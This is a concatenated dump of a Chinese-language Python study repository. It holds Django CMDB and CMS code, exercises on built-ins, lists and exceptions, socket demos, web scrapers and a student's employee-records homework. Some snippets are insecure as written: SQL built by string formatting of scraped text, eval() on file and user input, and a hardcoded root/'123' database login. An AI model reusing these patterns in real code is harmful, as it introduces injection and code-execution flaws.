func(ha2) # class Animal: # pass # # class Dog(Animal):pass # class Person(Animal):pass # # # def func(a): # pass # # func(alex) # func(ha2)<file_sep>/cmdb/auto_server - 7 - 资产信息入库/api/migrations/0001_initial.py # -*- coding: utf-8 -*- # Generated by Django 1.11 on 2018-10-20 03:53 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='AssetRecord', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('content', models.TextField(null=True)), ('create_at', models.DateTimeField(auto_now_add=True)), ], options={ 'verbose_name_plural': '资产记录表', }, ), migrations.CreateModel( name='BusinessUnit', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=64, unique=True, verbose_name='业务线')), ], options={ 'verbose_name_plural': '业务线表', }, ), migrations.CreateModel( name='Disk', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('slot', models.CharField(max_length=8, verbose_name='插槽位')), ('model', models.CharField(max_length=32, verbose_name='磁盘型号')), ('capacity', models.FloatField(verbose_name='磁盘容量GB')), ('pd_type', models.CharField(max_length=32, verbose_name='磁盘类型')), ], options={ 'verbose_name_plural': '硬盘表', }, ), migrations.CreateModel( name='ErrorLog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=16)), ('content', models.TextField()), ('create_at', models.DateTimeField(auto_now_add=True)), ], options={ 'verbose_name_plural': '错误日志表', }, ), migrations.CreateModel( name='IDC', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', 
models.CharField(max_length=32, verbose_name='机房')), ('floor', models.IntegerField(default=1, verbose_name='楼层')), ], options={ 'verbose_name_plural': '机房表', }, ), migrations.CreateModel( name='Memory', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('slot', models.CharField(max_length=32, verbose_name='插槽位')), ('manufacturer', models.CharField(blank=True, max_length=32, null=True, verbose_name='制造商')), ('model', models.CharField(max_length=64, verbose_name='型号')), ('capacity', models.FloatField(blank=True, null=True, verbose_name='容量')), ('sn', models.CharField(blank=True, max_length=64, null=True, verbose_name='内存SN号')), ('speed', models.CharField(blank=True, max_length=16, null=True, verbose_name='速度')), ], options={ 'verbose_name_plural': '内存表', }, ), migrations.CreateModel( name='NIC', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=128, verbose_name='网卡名称')), ('hwaddr', models.CharField(max_length=64, verbose_name='网卡mac地址')), ('netmask', models.CharField(max_length=64)), ('ipaddrs', models.CharField(max_length=256, verbose_name='ip地址')), ('up', models.BooleanField(default=False)), ], options={ 'verbose_name_plural': '网卡表', }, ), migrations.CreateModel( name='Server', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('device_status_id', models.IntegerField(choices=[(1, '上架'), (2, '在线'), (3, '离线'), (4, '下架')], default=1)), ('cabinet_num', models.CharField(blank=True, max_length=30, null=True, verbose_name='机柜号')), ('cabinet_order', models.CharField(blank=True, max_length=30, null=True, verbose_name='机柜中序号')), ('hostname', models.CharField(max_length=128, unique=True)), ('sn', models.CharField(db_index=True, max_length=64, verbose_name='SN号')), ('manufacturer', models.CharField(blank=True, max_length=64, null=True, verbose_name='制造商')), ('model', 
models.CharField(blank=True, max_length=64, null=True, verbose_name='型号')), ('os_platform', models.CharField(blank=True, max_length=16, null=True, verbose_name='系统')), ('os_version', models.CharField(blank=True, max_length=16, null=True, verbose_name='系统版本')), ('cpu_count', models.IntegerField(blank=True, null=True, verbose_name='CPU个数')), ('cpu_physical_count', models.IntegerField(blank=True, null=True, verbose_name='CPU物理个数')), ('cpu_model', models.CharField(blank=True, max_length=128, null=True, verbose_name='CPU型号')), ('latest_date', models.DateField(null=True)), ('create_at', models.DateTimeField(auto_now_add=True)), ('business_unit', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.BusinessUnit', verbose_name='属于的业务线')), ('idc', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.IDC', verbose_name='IDC机房')), ], options={ 'verbose_name_plural': '服务器表', }, ), migrations.AddField( model_name='nic', name='server', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nic_list', to='api.Server'), ), migrations.AddField( model_name='memory', name='server', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='memory_list', to='api.Server'), ), migrations.AddField( model_name='errorlog', name='server', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='api.Server'), ), migrations.AddField( model_name='disk', name='server', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='disk_list', to='api.Server'), ), migrations.AddField( model_name='assetrecord', name='server', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='servers', to='api.Server'), ), ] <file_sep>/复习/内置函数和匿名函数.py # 一 内置函数 # # 1 输出 print # print(1,2,3,4,5,sep=';',end='| ') ##sep是以;分开每个数字,end是以|结尾的 #绝对值 # print(abs(-9)) #divmod返回商和余数 # print(divmod(9,4)) # 
print(pow(2,3,5)) #(2**3) 就是2的三次方,对5取余 8%5 #min最小值 # print(min(-1,0,3,4)) # # print(min(-1,0,3,4,key=abs)) ##算完绝对值之后,在返回最小值 #eval和exec # eval('print(123)') # exec('print(123)') # # print(eval('1+2-3*20/(2+3)'))##有返回值 # print(exec('1+2-3*20/(2+3)')) ##执行了但没有返回值 #format格式化显示,后面的数字代表距离 # print(format('test', '<2')) # print(format('test', '>20')) # print(format('test', '^40')) # ord字符串转数字 # print(ord('b')) ##repr用于%r格式化输出 # print(repr(1)) # print(1) # # print(repr('1')) #enumerate枚举 # ll=['a','b','c'] # for i,v in enumerate(ll): # print(i,v) #zip拉链 ret = zip([1, 2, 3, 4, 5], ('a', 'b', 'c', 'd'), (4, 5,0)) # 拉链方法 print(ret) for i in ret: print(i) #filter 重要 用于过滤,比如大于几的数字,或者偶数,奇数之类的 lst = [1, 4, 6, 7, 9, 12, 17] def func(num): if num % 2 == 0: return True filter(func, lst) ##分别把lst里面的值传给num,然后取出除2等于0的数字 for i in filter(func, lst): print(i) ##第二种方法 g = (i for i in lst if i%2 == 0) for i in g: print(i) #map求平方 def func(num): return num**2 for i in map(func,range(10)): print(i) # sorted排序(重要) # l = [1,-4,-2,3,-5,6,5] # # new_l = sorted(l,key=abs,reverse=True) ##按照绝对值大小,并且反序来排序的 # # print(new_l) # 二 匿名函数 # calc = lambda n:n**n # print(calc(2)) # # rs=lambda n,p:n**p # print(rs(2,3)) # for i in map(lambda num : num ** 2 ,range(10)):print (i) #打印1-9 ,9个数字的平方 # 现有两元组(('a'),('b')),(('c'),('d')),请使用python中匿名函数生成列表[{'a':'c'},{'b':'d'}] ret = map(lambda t:{t[0]:t[1]},zip((('a'),('b')),(('c'),('d')))) print(list(ret))<file_sep>/cmdb/auto_client - 7 - 资产信息入库/相关脚本/4.日志处理.py #!/usr/bin/python # -*- coding:utf-8 -*- import logging # 方式一: """ logging.basicConfig(filename='log1.log', format='%(asctime)s - %(name)s - %(levelname)s -%(module)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S %p', level=10) logging.info('info,asdfasdfasdfasdf') logging.error('error,asdfasdfasdf') """ # 方式二: file_handler = logging.FileHandler('xxxxxxxx.log', 'a', encoding='utf-8') file_handler.setFormatter(logging.Formatter(fmt="%(asctime)s - %(name)s - %(levelname)s: %(message)s")) logger = logging.Logger('s1', 
level=logging.INFO) logger.addHandler(file_handler) logger.info('1111') logger.error('2222') <file_sep>/day26/scrapy框架/pipelinepro/pipelinepro/pipelines.py # -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html import pymysql class PipelineproPipeline(object): # 作用:每当爬虫文件向管道提交一次item,该方法就会被调用一次。item参数就是接受到爬虫文件给提交过来的item对象 # 该方法只有在开始爬虫的时候被调用一次 fp = None def open_spider(self, spider): print('开始爬虫') self.fp = open('./qiubai_data.txt', 'w', encoding='utf-8') def process_item(self, item, spider): author = item['author'] content = item['content'] self.fp.write(author + ":" + content) return item # 该方法只有在爬虫结束后被调用一次 def close_spider(self, spider): print('爬虫结束') self.fp.close() # 这个是写入mysql数据库 的 create table qiubai (author varchar(100),content varchar(9999)); 创建表 class MyPipeline(object): conn = None cursor = None # 作用:每当爬虫文件向管道提交一次item,该方法就会被调用一次。item参数就是接受到爬虫文件给提交过来的item对象 def open_spider(self, spider): self.conn = pymysql.Connect(host="127.0.0.1", port=3306, db="scrapydb", charset="utf8", user="root",password="123") self.cursor = self.conn.cursor() print('mysql') def process_item(self, item, spider): author = item['author'] content = item['content'] sql = "insert into qiubai values('%s','%s')" % (author, content) try: self.cursor.execute(sql) self.conn.commit() except Exception as e: print(e) self.conn.rollback() return item <file_sep>/day2/03 list.py l = ['老男孩', 'alex', 'wusir', 'taibai', 'ritian'] # #增 # #append 在组后增加 # l.append('葫芦') # print (l) # # #insert插入 # # l.insert(1,'bob') ##在索引是1的地方插入 # print (l) # # #迭代添加 # # l.extend('alex') # print (l) # #删除 # #pop 有返回值,按照索引删除 # # print (l.pop(0)) # print (l) # #remove # l.remove('alex') # print (l) # # #clear 清空列表 # # l.clear() # # print (l) # # #del 内存级别删除列表 # # # del l # # print (l) # # #按索引删除 # # del l[1] # # print(l) # # #切片删除 # # del l[1:3] # print (l) #改 #按照索引去改 # print (l[2]) # 
l[2]= 'huningfei' # print (l) # #按照切片去改 # l[:2] = 'abc' ##把索引是0和1的全部改成了abc # print (l) # l[1:3] = [111,222,333] # print (l) # #查询 # #按照索引去查询,按照切片去查下 # for i in l: # print (i) # # #其他办法 # a = [8,7,8,3,3,5,3,1,2] # #count 计数 # print (a.count(8)) # # #len # print (len(a)) # # #sort 从小到大排序 a.sort() print (a) a.sort(reverse=True) ##从大到小 print (a) b = ['a','b','e','e','g'] #reverse ##倒过来排序 b.reverse() print (b) #联系 # l1 = [1, 2, 'alexdfdf', 'wusir',['oldboy', 'ritian', 10], 'taibai'] # # # # # l1[2]='ALEX' # # # print (l1[2]) # # l1[2] = l1[2].upper() # # print (l1) # # l1[-2].append('女神') # print (l1[-2]) # # l1[-2][1] = (l1[-2][1].capitalize()) # print (l1) # # l1[-2][2]=int(l1[-2][2]) + 90 # print (l1)<file_sep>/day21/CMS/fault_reporting/urls.py from django.conf.urls import url from fault_reporting import views urlpatterns = [ # 第一版, 特别low版 # url('^lob/(.*)/$', views.lob), # url('^tag/(.*)/$', views.tag), # url('^archive/(.*)/$', views.archive), # # # 第二版: 三合一 # url(r'(lob|tag|archive)/(.*)/$', views.sanhe1), # sanhe1(request, *args) args[0]=="lob" # 第三版: 四合一 url(r'(lob|tag|archive)/(.*)/$', views.index), # index(request, "lob", "游戏") # 首页 url('^$', views.index), # index(request) # 故障总结详情页面 url(r'^report/(\d+)/$', views.report_detail), url(r'^updown/$', views.updown), # 点赞 url(r'^comment/$', views.comment), # 评论 # 个人中心页面 url(r'^info/$', views.info), # 发表故障 url(r'^add-report/$', views.add_report), # 编辑故障总结 url(r'^edit-report/(\d+)/$', views.edit_report), # 删除故障总结 url(r'^del-report/(\d+)/$', views.del_report), #富文本编辑器 url(r'^upload-img/$', views.upload_img), ] <file_sep>/excle.py # # -*- coding: utf-8 -*- # # # 将多个Excel文件合并成一个 # import xlrd # import xlsxwriter # # # # 打开一个excel文件 # def open_xls(file): # fh = xlrd.open_workbook(file) # return fh # # # # 获取excel中所有的sheet表 # def getsheet(fh): # return fh.sheets() # # # # 获取sheet表的行数 # def getnrows(fh, sheet): # table = fh.sheets()[sheet] # return table.nrows # # # # 读取文件内容并返回行内容 # def getFilect(file, shnum): # fh = 
open_xls(file) # table = fh.sheets()[shnum] # num = table.nrows # for row in range(num): # rdata = table.row_values(row) # datavalue.append(rdata) # return datavalue # # # # 获取sheet表的个数 # def getshnum(fh): # x = 0 # sh = getsheet(fh) # for sheet in sh: # x += 1 # return x # # # if __name__ == '__main__': # # 定义要合并的excel文件列表 # allxls = ['D:/test/a.xls', 'D:/test/b.xls'] # # 存储所有读取的结果 # datavalue = [] # for fl in allxls: # fh = open_xls(fl) # x = getshnum(fh) # for shnum in range(x): # print("正在读取文件:" + str(fl) + "的第" + str(shnum) + "个sheet表的内容...") # rvalue = getFilect(fl, shnum) # # 定义最终合并后生成的新文件 # endfile = 'D:/test/excel3.xlsx' # wb1 = xlsxwriter.Workbook(endfile) # # 创建一个sheet工作对象 # ws = wb1.add_worksheet() # for a in range(len(rvalue)): # for b in range(len(rvalue[a])): # c = rvalue[a][b] # ws.write(a, b, c) # wb1.close() # print("文件合并完成") import glob # 需要用pip先安装 from numpy import * # 请提前在CMD下安装完毕,pip install numpy import xlrd # 同上 import xlwt # 同上 import time location = "D:/file/" # 你需要合并该目录下excel文件的指定的文件夹 date = "20171016" # 不需要,笔者在这里使用此参数作为合并后的excel文件名称 header = ["学校", "年级","班级","用户key","用户编号","用户姓名","电子邮箱","身份证号","生日","性别","绑定设备号"] # 表头,请根据实际情况制定 fileList = [] for fileName in glob.glob(location + "*.xls"): fileList.append(fileName) # 读取目标文件夹所有xls格式文件名称,存入fileList print("在该目录下有%d个xls文件" % len(fileList)) fileNum = len(fileList) matrix = [None] * fileNum # 实现读写数据 for i in range(fileNum): fileName = fileList[i] workBook = xlrd.open_workbook(fileName) try: sheet = workBook.sheet_by_index(0) except Exception as e: print(e) nRows = sheet.nrows matrix[i] = [0] * (nRows - 1) nCols = sheet.ncols for m in range(nRows - 1): matrix[i][m] = ["0"] * nCols for j in range(1, nRows): for k in range(nCols): matrix[i][j - 1][k] = sheet.cell(j, k).value fileName = xlwt.Workbook() sheet = fileName.add_sheet("combine") for i in range(len(header)): sheet.write(0, i, header[i]) rowIndex = 1 for fileIndex in range(fileNum): for j in range(len(matrix[fileIndex])): for colIndex in 
range(len(matrix[fileIndex][j])): sheet.write(rowIndex, colIndex, matrix[fileIndex][j][colIndex]) rowIndex += 1 print("已将%d个文件合并完成" % fileNum) fileName.save(location + date + ".xls") # fileName.save("D:\python21\python\.txt") <file_sep>/day19/form/templates/edit_book.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>编辑书籍</title> <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.css" rel="stylesheet"> </head> <body> <div class="container"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <h1>编辑书籍</h1> <form action="" method="post" novalidate autocomplete="off"> {% for field in form_obj %} <div class="form-group"> <label for="{{ field.id_for_label }}">{{ field.label }}</label> {{ field }} <p>{{ field.errors.0 }}</p> </div> {% endfor %} <input type="submit" class="btn btn-success"> </form> </div> </div> </div> </body> </html><file_sep>/day18/s21/s21/urls.py """s21 URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from app01 import views urlpatterns = [ url(r'^admin/', admin.site.urls), # 关于用户的url url(r'^login', views.login), url(r'^register_user/', views.register_user), url(r'^show_user/$', views.show_user), url(r'^del_user/$', views.del_user), url(r'^edit_user/$', views.edit_user), url(r'^add_user/$', views.add_user), url(r'^logout',views.logout), # 关于主机管理的url url(r'^show_host/$',views.show_host), # 添加主机 url(r'^add_host/$',views.add_host, name="add_host"), # 编辑主机 url(r'^edit_host/(?P<pk>\d+)$',views.edit_host,name="edit_host"), # 删除主机 url(r'^del_host/(?P<pk>\d+)$', views.del_host, name="del_host"), # 关于业务的操作 url(r'^show_service/$', views.show_service), # # 添加业务 url(r'^add_service/$', views.add_service, name="add_service"), # # 编辑业务 url(r'^edit_service/(?P<pk>\d+)$', views.edit_service, name="edit_service"), # # 删除业务 url(r'^del_service/(?P<pk>\d+)$', views.del_service, name="del_service"), # 用户业务关系 url(r'^user_service_list/$',views.user_service_list), #添加 # url(r'^add_user_service/$', views.add_user_service), #编辑 url(r'^edit_user_service/(?P<pk>\d+)$', views.edit_user_service), ] <file_sep>/deploy/web/views/user.py from django.shortcuts import render,HttpResponse,redirect from web.forms.user import UserModelForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def user_list(request): """ 用户列表 :param request: :return: """ # 获取用户传过来的要查看的页码,如果没有,默认是1 page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.UserInfo.objects.all().count() # 数据库中获取即可 pager = Pagination(page,total_count,request.path_info) depart_queryset = models.UserInfo.objects.all()[pager.start :pager.end] return render(request,'user_list.html',{'depart_queryset':depart_queryset,'pager':pager}) def user_add(request): """ 添加 用户 :param request: :return: """ if request.method == 'GET': form = UserModelForm() return 
render(request, 'form.html', {'form':form}) form = UserModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request,'user_list')) return render(request, 'form.html', {'form': form}) def user_edit(request,nid): """ 编辑 用户 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.UserInfo.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = UserModelForm(instance=obj) return render(request,'form.html',{'form':form}) # 带默认值 form = UserModelForm(data=request.POST,instance=obj) if form.is_valid(): print('写入数据库') form.save() return redirect(memory_reverse(request,'user_list')) return render(request, 'form.html', {'form': form}) def user_del(request,nid): """ 删除 用户 :param request: :param nid: :return: """ origin = memory_reverse(request,'user_list') if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.UserInfo.objects.filter(id=nid).delete() return redirect(origin)<file_sep>/day8/server.py import socket sk=socket.socket() #实例化一个对象 sk.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)#端口可以重用 sk.bind(('127.0.0.1',9100)) sk.listen()#监听 while True: conn,addr=sk.accept() #阻塞,三次握手完毕 while True: inp=input('请输入你要发送的消息:') conn.send(inp.encode('utf-8')) if inp == 'q': break ret=conn.recv(1024).decode('utf-8') if ret == 'q': break print(ret) conn.close() sk.close()<file_sep>/day4/优秀的作业/优秀的作业/张晨亮/day4.py # -*- encoding:utf-8 -*- import sys import os #生成器 def user_list_g(): with open('user_list.txt',encoding='utf-8',mode='r') as f: data =[eval(i) for i in f] for i in data: yield i #用户状态 login_status = False #装饰器 def zsq(args): def inner(): if login_status: args() else: print("请您先登录!!".center(60,'-')) return inner # 登录 def login(): print("提示,账号:123 密码:123".center(60,'!')) global login_status if login_status: print("您已登录!") else: count = 3 while count: l_g = user_list_g() luser =input("请输入账号:") lpass = input("请输入密码:") for i in l_g: if luser == 
i.get('username') and lpass == i.get('passwd'): login_status = True if login_status: print("登录成功!".center(60,'-')) break else: print("账号密码错误!") count -=1 # 读文件 @zsq def select1(): with open('list', 'r', encoding='utf-8') as f: line = f.readlines() for i in line: print(i) # 查 @zsq def select(): ''' 函数查询 :return: ''' print("功能提示".center(60,'~')) msg = ''' 1.select name,age from staff_table where age > 22 2.select * from staff_table where dept = "IT" 3.select * from staff_table where enroll_date like "133" ''' print(msg) print("功能提示".center(60,'~')) user_input = input('SQL>>>:').strip() user_inupt1 = user_input.split(' ') if user_input == 'select name,age from staff_table where age > %s' % (user_inupt1[7]): with open('list', 'r+', encoding='utf-8') as f: list1 = [] count = 0 for line in f: i = line.strip().split(',') if i[2] > user_inupt1[7]: list1.append(i) for s in list1: count = count + 1 for j in list1: print(j) elif user_input == ('select * from staff_table where dept = %s' % (user_inupt1[7])): with open('list', 'r', encoding='utf-8') as f: list2 = [] count = 0 for line in f: i1 = line.strip().split(',') if i1[4] == eval(user_inupt1[7]): list2.append(i1) count = count + 1 for j1 in list2: print(j1) elif user_input == ('select * from staff_table where enroll_date like %s' % (user_inupt1[7])): with open('list', 'r+', encoding='utf-8') as f: list3 = [] list4 = [] count = 0 for line in f: i = line.strip().split(',') list3.append(i) for j in list3: m = j[4] if m[0] == eval(user_inupt1[7]): list4.append(j) for s in list4: count = count + 1 if count < 1: print('没有找到类似条目!!!') pass else: pass for j in list4: print(j) return () # 曾 @zsq def alter(): ''' 添加函数 :return: ''' print("功能提示".center(60,'^')) msg = ''' 1)命令如:zs,24,13651054601,HR, 格式: 名字,年龄,电话,职业, (以逗号分隔!!) 
''' print(msg) print("功能提示".center(60, '^')) user_input = input('SQL>>>:') user_input1 = user_input.split(',') with open('list', 'r+', encoding='utf-8') as f: lists = [] for line in f: s2 = line.strip().split(',') m = s2[3] lists.append(m) if user_input1[2] in lists: print('这条记录已经存在!!!') main() else: my_index = str(len(lists) + 1) user_input1.insert(0, my_index) user_input1 = ','.join(user_input1) f.flush() f.write(user_input1) f.write('\n') f.close() print("记录添加完成!!!", '\n') return () # 删 @zsq def delect(): ''' 删除函数 :return: ''' print("功能提示".center(60,'*')) print('-----请输入删除命令例如:输入用户ID 即可以从list中删除!') msg = ''' 1)按1删除、直接删除ID即可 2)按2或者q退出 ''' print(msg) print("功能提示".center(60, '*')) user_input = input('SQL>>>:') if user_input == '1': print('现有的用户为:') select1() print('\n') user_input1 = input('请输入需要删除的用户ID:') user_input2 = user_input1[0] f = open('list', 'r+', encoding='utf-8') f1 = open('new_list', 'w+', encoding='utf-8') for line in f: i = line.strip().split(',') i1 = i[0] if user_input2 != i1: i = ','.join(i) f1.write(i) f1.write('\n') else: continue f.close() f1.close() os.remove('list') os.rename('new_list', 'list') print('\n') select1() elif user_input == '2' or 'q': sys.exit() return # 更新 @zsq def update(): ''' 更新函数 :return: ''' msg = ''' 1)这里第一个等号按照没有空格的格式划分 2)命令范例:UPDATE staff_table SET dept="INS" where dept = "HR" ''' print(msg) user_choice_input = input('SQL>>>:') user_choice_input1 = user_choice_input.split(' ') dept = user_choice_input1[3].split('=') dept_new = dept[1] dept_old = user_choice_input1[7] if user_choice_input == ('UPDATE staff_table SET dept=%s where dept = %s' % (dept_new, dept_old)): dept_new1 = eval(dept_new) dept_old1 = eval(dept_old) f = open('list', 'r+', encoding='utf-8') f1 = open('new_list', 'w+', encoding='utf-8') for line in f: i = line.strip().split(',') dept_change = i[4] if dept_change == dept_old1: i[4] = eval(dept_new) i = ','.join(i) f1.write(i) f1.write('\n') f.close() f1.close() os.remove('list') os.rename('new_list', 
'list') print('\n') select1() pass return () # 交互 def main(): ''' 交互 :return: ''' print('员工信息选择'.center(60,'*')) msg = ''' 1、登录 2、查询 3、添加 4、删除 5、更新 6、退出 ''' exit_fiag = False while not exit_fiag: print(msg) user_choice = input('请选择>>>:').strip() if user_choice == '2': select() elif user_choice == '3': alter() elif user_choice == '4': delect() elif user_choice == '5': update() elif user_choice == '6': sys.exit() elif user_choice == '1': login() else: print('输入错误!,请重新输入!!!') main() main()<file_sep>/day8/异常处理.py # s1 = 'hello' # try: # int(s1) # except ValueError as e: # print(e) #多分枝 # s1 = 'hello' # try: # int(s1) # except IndexError as e: # print(e) # except KeyError as e: # print(e) # except ValueError as e: # print(e) #万能异常 # # # s1 = 'hello' # try: # int(s1) # except Exception as e: # print(e) # try: # f=open('a','w') # l=[1] # num=int(input('num:')) # l[num] # except ValueError:print('请输入一个数字') # except IndexError:print('你要找的项目不存在') # except Exception as e:print(e) # else:print('执行elses')# 如果try语句中的代码都顺利的执行了,没有报错,那么执行else中的代码 # finally: ##(无论如何都会执行finally) # print('执行了finally') # f.close() #重用的处理异常结构 # try: # pass #可能有问题的代码 # except ValueError: # 能预料到的错误 # pass # except Exception as e:print(e) # 能处理错有的异常 # else:pass # try中的代码没有错误的时候执行 # finally:pass #主动触发异常 # try: # raise TypeError('类型错误') # except Exception as e: # print(e) #断言 assert assert 1==1 print('ok') # assert 1==2 # print('error') <file_sep>/复习/递归和二分查找算法.py # 例子算年龄 问你a几岁,a比b大2岁,b比c大2岁,c是40岁,问你a几岁? 
def age(n): if n == 3: return 40 else: return age(n+1)+2 print(age(1)) #二分算法 l = [2,3,5,10,15,16,18,22,26,30,32,35,41,42,43,55,56,66,67,69,72,76,82,83,88] def cal(l, num, start, end): ''' :param l: 是列表 :param num: 要找的数字 :param start: 开始索引 :param end: 结束索引 :return: ''' if start < end: mid = (end - start) // 2 + start ##mid代表索引 # print(start,end) if l[mid] < num: return cal(l, num, mid + 1, end) elif l[mid] > num: return cal(l, num, start, mid - 1) else: return mid, l[mid] else: return '没找到' print(cal(l, 55, 0, len(l) - 1))<file_sep>/day25/xpath爬取方法.py # 需求,爬取笑话网中的段子内容和作者 from lxml import etree import requests url = 'https://www.xiaohua.com/duanzi/' headers = { #对UA进行重写操作(伪装) 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } response = requests.get(url=url,headers=headers) page_text = response.text # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_text) div_list = tree.xpath('//div[@class="content-left"]/div[@class="one-cont"]') print(div_list) # 写入到文件 fp = open('./xiaohua.txt', 'w', encoding='utf-8') for div in div_list: # print(div) author = div.xpath('//div[@class="one-cont-font clearfix"]//i/text()')[0] # print(author) content = div.xpath('./p/a//text()')[0] print(content) fp.write(author + ":" + content + "\n\n") fp.close() <file_sep>/day8/ftp作业/server_login.py import hashlib import configparser import socket import struct import json def register_login(): # global conn # global user_pwd # while True: config = configparser.ConfigParser() config.read('userinfo') user = (config.sections()) for i in user: if i == username and config[i]['passwd']== pwd: conn.send('登录成功'.encode('utf-8')) else: conn.send('你输入的用户名或密码错误'.encode('utf-8')) sk=socket.socket() sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sk.bind(('127.0.0.1', 8090)) sk.listen() while True: conn,addr=sk.accept() print('连接成功') while True: user_pwd=json.loads(conn.recv(1024).decode('utf-8')) username=user_pwd[0] 
pwd=<PASSWORD>[1] print(user_pwd[0],user_pwd[1]) conn.close() sk.close() # def init_socker(): # sk=socket.socket() # sk.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) # sk.bind(('127.0.0.1',8090)) # sk.listen() # while True: # print('>>>等待客户端连接...') # conn,addr=sk.accept() # print('连接成功') # while True: # print('------等待接收') # ret=conn.recv(1024).decode('utf-8')#接受到一个字符串 # user_pwd=json.load(ret) # conn.close() # sk.close() # # if __name__=='__main__': #init_socker() register_login() <file_sep>/day16/s21/app01/models.py from django.db import models # Create your models here. #创建用户库 class User(models.Model): id = models.AutoField(primary_key=True) username=models.CharField(max_length=32,unique=True) password=models.CharField(max_length=32) def __str__(self): return self.username <file_sep>/day9/协程/协程.py # 进程 计算机中资源分配的最小单位 cpu+1 # 线程 CPU 调度最小单位 cpu*5 # 协程 把一个线程拆分成几个 500 # 进程 线程 都是操作系统在调度 # 协程 是程序级别调度 # 减轻了操作系统的负担、增强了用户对程序的可控性 from gevent import monkey;monkey.patch_all() import gevent import time def eat(name): print('%s eat 1' %name) time.sleep(2) print('%s eat 2' %name) def play(name): print('%s play 1' %name) time.sleep(1) print('%s play 2' %name) g1=gevent.spawn(eat,'egon') g2=gevent.spawn(play,name='egon') g1.join() g2.join() # gevent.joinall([g1,g2]) print('主') <file_sep>/day6/关联.py # from math import pi # class Cricle: # def __init__(self,r): # self.r=r # @property # def area(self): # return self.r ** 2 *pi # def perimeter(self): # return self.r *2 * pi # c=Cricle(3) # # print(c.area()) # print(c.area) # print(c.perimeter()) #计算房间的面积 class Room: def __init__(self,chang,kuan,gao): self.chang=chang self.kuan=kuan self.gao=gao def area(self): return self.chang*self.kuan*self.gao a = Room(2,3,4) print(a.area())<file_sep>/day24/auto - 9 - 任务:构建权限和菜单的数据结构/auto - 9 - 任务:构建权限和菜单的数据结构/app01/urls.py from django.conf.urls import url,include from django.contrib import admin from app01 import views urlpatterns = [ url(r'^login/$', views.login), ] <file_sep>/复习/循环.py # 
如果while循环被break打断,就不走else count = 1 while count < 5: if count ==4: break print(count) count += 1 else: print('循环正常完毕') # 打印1-10 ,7除外 # count=0 # while count <10: # count += 1 # if count==7: # pass # else: # print(count) # 求1到100所有数之和 # a=0 # sum=0 # while a <100: # a=a+1 # sum=sum+a # print(sum) # 求1到100所有奇数之和 # a=0 # while a < 100: # a = a + 1 # if a % 2 == 1: # print(a) # 所有偶数 # a=0 # while a < 100: # a = a + 1 # if a % 2 == 0: # print(a) # 求1-2+3-4+5 ... 99的所有数的和 奇数和偶数 # sum1=0#奇数 # sum2=0#偶数 # i=0 # while i <100: # i=i+1 # if i%2==1: # sum1=sum1+i#i=3 sum1+3=0+3 i=5 就是0+5 # else: # sum2=sum2+i # print(sum1-sum2) # 用户登录三次机会 ''' user='hu' passwd='123' i=0 print('请注意,一共有三次登录机会') while i <3: i+=1 username=input('请输入你的用户名:') if username==user: password=input('请输入密码:') if password==passwd: print("恭喜你,登录成功") break else: print('你输入的密码有误,你已经用了%s次了'%(i)) else: print('用户名错误,你已经用了%s次了'%(i)) ''' # msg = '老男孩python是全国范围内最好的python培训机构' # for item in msg: # print(item) # li = ['alex','银角','女神','egon','太白'] # for i in enumerate(li): # print(i) # # for index,name in enumerate(li): # print(index,name) # for index, name in enumerate(li, 100): # 起始位置默认是0,可更改 # print(index, name) <file_sep>/day10/作业/server端.py import socket 